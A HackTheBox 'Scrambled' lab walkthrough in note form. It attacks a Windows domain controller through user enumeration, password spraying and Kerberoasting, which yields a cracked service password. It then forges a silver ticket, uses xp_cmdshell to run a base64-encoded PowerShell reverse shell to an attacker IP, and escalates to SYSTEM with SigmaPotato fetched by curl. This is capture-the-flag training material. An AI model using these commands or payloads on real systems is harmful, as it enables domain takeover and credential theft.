HackTheBox · Lab
Scrambled
NOTES
ENUMERATION
### NMAP
```shell
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-30 18:21:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.168:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-08-30T18:18:20
|_Not valid after: 2055-08-30T18:18:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-30T18:24:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
```
### Users found through manual web inspection p80
```shell
support
ksimpson
```
FOOTHOLD
### Valid username
```shell
❯ kerbrute userenum -d $DOMAIN --dc $IP users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/30/25 - Ronnie Flathers @ropnop
2025/08/30 20:32:21 > Using KDC(s):
2025/08/30 20:32:21 > 10.10.11.168:88
2025/08/30 20:32:21 > [+] VALID USERNAME: ksimpson@scrm.local
```
### Valid username:password
```shell
❯ kerbrute passwordspray -d $DOMAIN --dc dc1.$DOMAIN users 'ksimpson'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/30/25 - Ronnie Flathers @ropnop
2025/08/30 20:40:35 > Using KDC(s):
2025/08/30 20:40:35 > dc1.scrm.local:88
2025/08/30 20:40:35 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
```
### TGT Extraction with getTGT.py
```shell
getTGT.py $DOMAIN/$USER:$PASS
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in ksimpson.ccache
```
### Import of ticket
```shell
export KRB5CCNAME=ksimpson.ccache
```
### Kerberoasting
```shell
GetUserSPNs.py $DOMAIN/$USER:$PASS -dc-host $HOST.$DOMAIN -k -no-pass -request
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 17:32:02.351452 2025-08-30 20:18:16.938878
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 17:32:02.351452 2025-08-30 20:18:16.938878
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$660281197a248e6f340f90ce46f8a19a$201dddb0d302bc683881f29a6916705137217e6bb79d362cd45f68113d03ed579c0b27c197f79aae334cd97fcafb56f384bfee126428b7dd63cd0c0558cc2649afc90c03662cdd5696ef0e8b9493f213fdfacfae96ed84858d3915483a5832fe68e4c8d9e4e08baa0700f08630b27ce16aef258a32d73bc788934646052eea92f69cabab0b2e05b7fed065e6f0f425af055ce24ee299803b4c3678bbcd92d2264bb4e73921b4cc7921928001fa204b1def83ad421e646d31bc5b0779585be18ab10ab052c569746d21ea941712963a4bac1dbefea4cac62e78e592bfc091dbe557a57fe9d02fd206af238814432dc547bdfb8a1ddc6bafbde4507e536d18227d329df75f99c1d6f97309cbee692712c2ee03ff7738847aecb4f1c0e9bae5e8fdfad5b628e43aa5ae5fb0cc19de758e779dab937bee2ea8f8c1122777a28cafed411eecc142e32d5f01764668a6f309eb01c07378650af2ac09903ff264506332f58b42470c5643af51142d491acef85db2285c090c3e445d48bff57f14e3725de86bb32d5f1fde8bcac9447ef6647b173973f0bbcfca3536050f6e77b4d84b7ade44b96b92027ca8bb27f69ac019c9b05c76df39f88459fa070b2d3bf330d5b5a91f3bc44008c7454c91b72194c6738f43277a62711ad5653eee5d74a4d014c2a650ecce55bf5b03555de99437f7d33539776a023fbda5a31bd697d38312c4d8de299b8064feb1f28edebd77ed40cffc1e2f05073c47485e6a12e2300e40a2bed19816887a2c20910089f6ca0b8faf90703aa7b20dabcca7daaee099ab9dc476baa3aba7f756df2f40bed94ae663d0f2d7b40869d8704dee942d48e2ef244dfa6570a23044cdfd005f913963950584f274f4d219df43228a72cc6d87ae7a86c9e78f67678ad3d19f9f09553783d657d5ca657aac4770a6f3e77ec6377026e890bb4619a08051364b70a0e893a3a69a7b81b685730f12d40d4888b0f089a82a2ab50783df6d2871e5fd41270140ce55d06ad2cd744edc6929857ad43a76ebf1e0e71bc7699a3670804a6af16d71390d90d73220b40186c0efa61f8d7ed155c3be5bf2b65c40f70448fb61d06c4d027ca1db96021719000368c2b5a1e8a853cf58c90a5708d71add4b6701f6ece0e424bd776b07cc2747ab96a2317f6b0924a1dd142b210887aebb35be23fa5df50c031134fd4c61c12ac38e091aa2c641e31b0c497d29cf9a50ac42751202aa7c2ed5da97fb386b86d87cb351e48211552631d5934ff93cf9bdd8379eca67c98a409b71a82f50376c93f1a032ab06d65448305b4eca862258b869f77b72db81f1d4b3500b5f12b4c4c4dee7fb6d882b92be929713fceef4caa1a14ec9468a3c775399a7531def4abcc1d249ed1ae41277f2695d5478944cb83ca27e613e3dec3c9ec6fb21ec098fc94f8db02efd4c
```
### Cracked with hashcat
```shell
$krb5tgs$23$*...SNIP...2efd4c:
Pegasus60
```
### Creds found:
- sqlsvc:Pegasus60
### Creds valid
```shell
[+] VALID LOGIN: sqlsvc@scrm.local:Pegasus60
```
### Redoing process for `sqlsvc` user
```shell
getTGT.py $DOMAIN/$USER:$PASS
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in sqlsvc.ccache
export KRB5CCNAME=sqlsvc.ccache
```
PRIVILEGE ESCALATION
### For further escalation we need TGT
```shell
ticketer.py -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain $DOMAIN
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
```
### Exporting new ticket
```shell
export KRB5CCNAME=Administrator.ccache
```
### Logging into SQL
```shell
mssqlclient.py $HOST.$DOMAIN -k
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
```
### Revshell from MSSQL
PowerShellOneLine.ps1
```shell
cat rev.ps1 | iconv -t UTF-16LE | base64 -w 0
```
```shell
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA
```
```shell
xp_cmdshell powershell -enc JABjAGwA....SNIP....aQBlAG4A
```
```shell
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.168] 59150
whoami
scrm\sqlsvc
```
```shell
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
```
### SigmaPotato.exe for Exploit
Let’s create a bat-file with the same execution as earlier
```shell
powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA
```
Let’s upload both `SigmaPotato.exe` & `rev.bat`
```shell
simplehttp 80
Server will be available at:
http://10.10.14.5:80
```
```shell
PS C:\programdata> curl http://10.10.14.5:80/rev.bat -o rev.bat
PS C:\programdata> curl http://10.10.14.5:80/SigmaPotato.exe -o sp.exe
```
New listener
```shell
nc -lnvp 4444
```
```shell
PS C:\programdata> .\sp.exe rev.bat
```
```shell
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.168] 64844
PS C:\programdata> whoami
nt authority\system
```
SYSTEM OWNAGE
```shell
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.168] 64844
PS C:\programdata> whoami
nt authority\system
```
CLEANUP
WEB SERVICE TECHNOLOGY
WEB
NIKTO
WFUZZ / GOBUSTER
### FILES
### DIRS
### SUBDIRS
### VHOSTS
SCOPE
| IP | HOSTNAME | DOMAIN NAME | OS |
|---|---|---|---|
| 10.10.11.168 | DC1 | scrm.local | Win Serv 2019? |